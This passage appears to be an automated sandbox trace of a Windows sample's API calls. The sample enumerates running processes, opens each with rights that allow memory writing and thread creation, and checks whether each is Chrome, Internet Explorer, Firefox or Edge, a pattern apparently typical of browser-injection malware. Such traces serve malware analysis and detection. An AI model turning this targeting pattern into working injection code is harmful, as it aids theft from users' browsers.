	[0200.530] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0200.531] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x1c6c
	[0200.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.531] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0200.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.532] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.532] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0200.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.532] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.533] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0200.533] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x1c70
	[0200.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.533] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0200.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.534] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.534] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0200.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.534] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.534] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0200.535] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1c74
	[0200.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.535] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0200.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.536] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.536] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0200.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.536] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.537] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0200.537] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1c78
	[0200.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.537] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0200.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.538] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.538] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0200.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.539] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.539] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0200.539] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1c7c
	[0200.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.540] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0200.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.540] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.540] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0200.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.541] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.541] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0200.541] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1c80
	[0200.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.542] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0200.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.542] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.542] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0200.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.542] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.543] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.543] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x1c84
	[0200.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.543] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.544] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.544] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.544] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.545] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.545] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x1c88
	[0200.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.545] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.546] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.546] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.546] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.547] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.547] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x1c8c
	[0200.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.548] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.548] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.548] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.549] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.549] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.549] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x1c90
	[0200.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.550] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.550] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.550] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.551] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.551] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.551] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x1c94
	[0200.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.552] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.552] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.552] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.553] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.553] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.554] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x1c98
	[0200.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.554] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.554] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.555] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.555] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.555] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.556] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x1c9c
	[0200.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.556] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.557] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.557] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.557] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.557] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0200.558] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1ca0
	[0200.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.558] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0200.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.559] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.559] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0200.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.559] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.559] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.560] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x1ca4
	[0200.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.560] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.561] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.561] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.561] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.561] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0200.562] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x1ca8
	[0200.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.562] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.563] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.563] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.563] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.563] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0200.564] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x1cac
	[0200.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.564] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0200.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.565] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.565] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0200.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.565] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.565] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.566] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x1cb0
	[0200.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.566] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.567] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.567] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.567] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.568] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0200.568] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x1cb4
	[0200.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.568] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0200.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.569] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.569] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0200.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.569] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.570] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0200.570] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x1cb8
	[0200.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.571] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0200.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.571] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.571] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0200.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.572] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.572] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0200.572] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1cbc
	[0200.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.573] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0200.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.573] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.573] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0200.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.573] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.573] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0200.574] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x1cc0
	[0200.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.574] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0200.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.575] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.575] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0200.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.575] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.576] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0200.576] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0200.576] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0200.577] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x1cc4
	[0200.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.577] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0200.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.578] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.578] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0200.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.579] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.579] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0200.580] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x1cc8
	[0200.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.580] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0200.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.581] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.581] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0200.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.581] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.581] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0200.582] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x1ccc
	[0200.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.582] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
